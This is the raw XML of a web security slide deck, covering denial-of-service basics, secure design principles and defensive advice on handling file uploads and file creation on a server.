            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3">
              <a:extLst/>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="5933440" y="1937173"/>
              <a:ext cx="1300481" cy="1368214"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="12700" cap="flat">
              <a:noFill/>
              <a:miter lim="400000"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="1233" name="Computer_DesktopComputer01" descr="Computer_DesktopComputer01"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3">
              <a:extLst/>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1225973" y="417688"/>
              <a:ext cx="1300481" cy="1368215"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="12700" cap="flat">
              <a:noFill/>
              <a:miter lim="400000"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="1234" name="Computer_DesktopComputer01" descr="Computer_DesktopComputer01"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3">
              <a:extLst/>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="4743591" y="379306"/>
              <a:ext cx="1300481" cy="1368215"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="12700" cap="flat">
              <a:noFill/>
              <a:miter lim="400000"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="1235" name="Computer_DesktopComputer01" descr="Computer_DesktopComputer01"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3">
              <a:extLst/>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="2966720" y="0"/>
              <a:ext cx="1300481" cy="1368214"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="12700" cap="flat">
              <a:noFill/>
              <a:miter lim="400000"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="1236" name="RAS Connection-org" descr="RAS Connection-org"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4">
              <a:extLst/>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm rot="782320">
              <a:off x="2022968" y="2483555"/>
              <a:ext cx="1192108" cy="1761068"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="12700" cap="flat">
              <a:noFill/>
              <a:miter lim="400000"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1238" name="Attacker01" descr="Attacker01"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3341511" y="6362417"/>
            <a:ext cx="2926081" cy="2553548"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1239" name="A technique that allows malicious users to compromise the availability of your application:…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1505937" y="2059093"/>
            <a:ext cx="9992926" cy="6676250"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="323850" indent="-323850" defTabSz="1300480">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:buSzPct val="70000"/>
              <a:buBlip>
                <a:blip r:embed="rId6"/>
              </a:buBlip>
              <a:defRPr b="1" sz="3400">
                <a:latin typeface="Arial Narrow"/>
                <a:ea typeface="Arial Narrow"/>
                <a:cs typeface="Arial Narrow"/>
                <a:sym typeface="Arial Narrow"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>A technique that allows malicious users to compromise the availability of your application:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="323850" indent="-323850" defTabSz="1300480">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:buSzPct val="70000"/>
              <a:buBlip>
                <a:blip r:embed="rId6"/>
              </a:buBlip>
              <a:defRPr b="1" sz="3400">
                <a:latin typeface="Arial Narrow"/>
                <a:ea typeface="Arial Narrow"/>
                <a:cs typeface="Arial Narrow"/>
                <a:sym typeface="Arial Narrow"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Resource starvation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="325120" indent="-325120" defTabSz="1300480">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr b="1" sz="3400">
                <a:latin typeface="Arial Narrow"/>
                <a:ea typeface="Arial Narrow"/>
                <a:cs typeface="Arial Narrow"/>
                <a:sym typeface="Arial Narrow"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>	(memory, cpu, etc.)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="323850" indent="-323850" defTabSz="1300480">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:buSzPct val="70000"/>
              <a:buBlip>
                <a:blip r:embed="rId6"/>
              </a:buBlip>
              <a:defRPr b="1" sz="3400">
                <a:latin typeface="Arial Narrow"/>
                <a:ea typeface="Arial Narrow"/>
                <a:cs typeface="Arial Narrow"/>
                <a:sym typeface="Arial Narrow"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Disabling service</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1" name="Defending Against Denial of Service Attacks"/>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Defending Against Denial of Service Attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1242" name="Consider security as a design feature…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1505937" y="2059093"/>
            <a:ext cx="9992926" cy="6676250"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="t"/>
          <a:lstStyle/>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Consider security as a design feature</a:t>
            </a:r>
          </a:p>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Distrust user input</a:t>
            </a:r>
          </a:p>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Fail intelligently</a:t>
            </a:r>
          </a:p>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Test security</a:t>
            </a:r>
          </a:p>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If accepting file uploads, limit the size of the file</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6" name="File Upload / Creation"/>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File Upload / Creation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1247" name="Providing functionality for users to upload files:…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1505937" y="2059093"/>
            <a:ext cx="9992926" cy="6676250"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="323850" indent="-323850" defTabSz="1300480">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:buSzPct val="70000"/>
              <a:buBlip>
                <a:blip r:embed="rId2"/>
              </a:buBlip>
              <a:defRPr b="1" sz="3400">
                <a:latin typeface="Arial Narrow"/>
                <a:ea typeface="Arial Narrow"/>
                <a:cs typeface="Arial Narrow"/>
                <a:sym typeface="Arial Narrow"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Providing functionality for users to upload files:</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That persist on the server</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Whose contents are extracted and used </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="323850" indent="-323850" defTabSz="1300480">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:buSzPct val="70000"/>
              <a:buBlip>
                <a:blip r:embed="rId2"/>
              </a:buBlip>
              <a:defRPr b="1" sz="3400">
                <a:latin typeface="Arial Narrow"/>
                <a:ea typeface="Arial Narrow"/>
                <a:cs typeface="Arial Narrow"/>
                <a:sym typeface="Arial Narrow"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Providing functionality for users to provide content with which files are created on the server</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9" name="Last line of Defence ?"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Last line of Defence ?</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9" name="File Upload Considerations"/>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File Upload Considerations </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1250" name="The HTTP POST method is preferable to the HTTP PUT method…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1505937" y="2059093"/>
            <a:ext cx="9992926" cy="6676250"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="323850" indent="-323850" defTabSz="1300480">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:buSzPct val="70000"/>
              <a:buBlip>
                <a:blip r:embed="rId2"/>
              </a:buBlip>
              <a:defRPr b="1" sz="3400">
                <a:latin typeface="Arial Narrow"/>
                <a:ea typeface="Arial Narrow"/>
                <a:cs typeface="Arial Narrow"/>
                <a:sym typeface="Arial Narrow"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>The HTTP POST method is preferable to the HTTP PUT method</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="323850" indent="-323850" defTabSz="1300480">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:buSzPct val="70000"/>
              <a:buBlip>
                <a:blip r:embed="rId2"/>
              </a:buBlip>
              <a:defRPr b="1" sz="3400">
                <a:latin typeface="Arial Narrow"/>
                <a:ea typeface="Arial Narrow"/>
                <a:cs typeface="Arial Narrow"/>
                <a:sym typeface="Arial Narrow"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Scan the uploaded files for viruses immediately</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But don’t assume virus-free files are safe!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="323850" indent="-323850" defTabSz="1300480">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:buSzPct val="70000"/>
              <a:buBlip>
                <a:blip r:embed="rId2"/>
              </a:buBlip>
              <a:defRPr b="1" sz="3400">
                <a:latin typeface="Arial Narrow"/>
                <a:ea typeface="Arial Narrow"/>
                <a:cs typeface="Arial Narrow"/>
                <a:sym typeface="Arial Narrow"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Limit the size of the upload</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Otherwise can be an avenue for an easy DoS attack or lead to unexpected behavior</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="323850" indent="-323850" defTabSz="1300480">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:buSzPct val="70000"/>
              <a:buBlip>
                <a:blip r:embed="rId2"/>
              </a:buBlip>
              <a:defRPr b="1" sz="3400">
                <a:latin typeface="Arial Narrow"/>
                <a:ea typeface="Arial Narrow"/>
                <a:cs typeface="Arial Narrow"/>
                <a:sym typeface="Arial Narrow"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>When providing files for download scan for viruses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="323850" indent="-323850" defTabSz="1300480">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:buSzPct val="70000"/>
              <a:buBlip>
                <a:blip r:embed="rId2"/>
              </a:buBlip>
              <a:defRPr b="1" sz="3400">
                <a:latin typeface="Arial Narrow"/>
                <a:ea typeface="Arial Narrow"/>
                <a:cs typeface="Arial Narrow"/>
                <a:sym typeface="Arial Narrow"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Treat client-supplied files like any other element of user input and validate, validate, validate!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250">
                                            <p:bg/>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="dissolve" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1250">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250">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="dissolve" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="10" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="125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1250">
                                            <p:txEl>
                                              <p:pRg st="1" end="1"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="dissolve" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="15" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1250">
                                            <p:txEl>
                                              <p:pRg st="1" end="1"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="16" presetClass="entr" nodeType="withEffect" presetSubtype="0" presetID="9" grpId="1" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="17" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1250">
                                            <p:txEl>
                                              <p:pRg st="2" end="2"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="dissolve" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="18" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1250">
                                            <p:txEl>
                                              <p:pRg st="2" end="2"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="19" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="20" presetClass="entr" nodeType="afterEffect" presetID="9" grpId="1" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="21" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1250">
                                            <p:txEl>
                                              <p:pRg st="3" end="3"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="dissolve" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="22" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1250">
                                            <p:txEl>
                                              <p:pRg st="3" end="3"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="23" presetClass="entr" nodeType="withEffect" presetSubtype="0" presetID="9" grpId="1" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="24" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1250">
                                            <p:txEl>
                                              <p:pRg st="4" end="4"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="dissolve" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="25" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="125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1" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="29" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1250">
                                            <p:txEl>
                                              <p:pRg st="5" end="5"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="dissolve" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="30" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1250">
                                            <p:txEl>
                                              <p:pRg st="5" end="5"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="31" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="32" presetClass="entr" nodeType="afterEffect" presetID="9" grpId="1" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="33" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1250">
                                            <p:txEl>
                                              <p:pRg st="6" end="6"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="dissolve" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="34" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1250">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250" grpId="1"/>
    </p:bldLst>
  </p:timing>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2" name="File Upload Considerations (cont.)"/>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File Upload Considerations (cont.)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1253" name="In general, try to store client-supplied files on their own partition.  Avoid storing them on the same partition as the web site, and always avoid storing them on the system drive…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1505937" y="2059093"/>
            <a:ext cx="9992926" cy="6676250"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="t"/>
          <a:lstStyle/>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In general, try to store client-supplied files on their own partition.  Avoid storing them on the same partition as the web site, and always avoid storing them on the system drive</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If client-supplied files are stored on the web site partition, make sure that they never reside within the web site directory tree</a:t>
            </a:r>
          </a:p>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When storing client-supplied files on disk, generate your own file paths and file names</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Do not allow user-supplied data to influence the path or name of the file as it is actually stored on disk</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253">
                                            <p:bg/>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="dissolve" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1253">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253">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="dissolve" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="10" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1253">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="11" presetClass="entr" nodeType="withEffect" presetSubtype="0" presetID="9" grpId="1" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="12" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1253">
                                            <p:txEl>
                                              <p:pRg st="1" end="1"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="dissolve" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1253">
                                            <p:txEl>
                                              <p:pRg st="1" end="1"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="14" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="15" presetClass="entr" nodeType="afterEffect" presetID="9" grpId="1" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="16" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1253">
                                            <p:txEl>
                                              <p:pRg st="2" end="2"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="dissolve" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="17" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1253">
                                            <p:txEl>
                                              <p:pRg st="2" end="2"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="18" presetClass="entr" nodeType="withEffect" presetSubtype="0" presetID="9" grpId="1" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="19" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1253">
                                            <p:txEl>
                                              <p:pRg st="3" end="3"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="dissolve" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="20" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1253">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253" grpId="1"/>
    </p:bldLst>
  </p:timing>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7" name="File Creation Considerations"/>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File Creation Considerations </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1258" name="Validate, validate, validate!…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
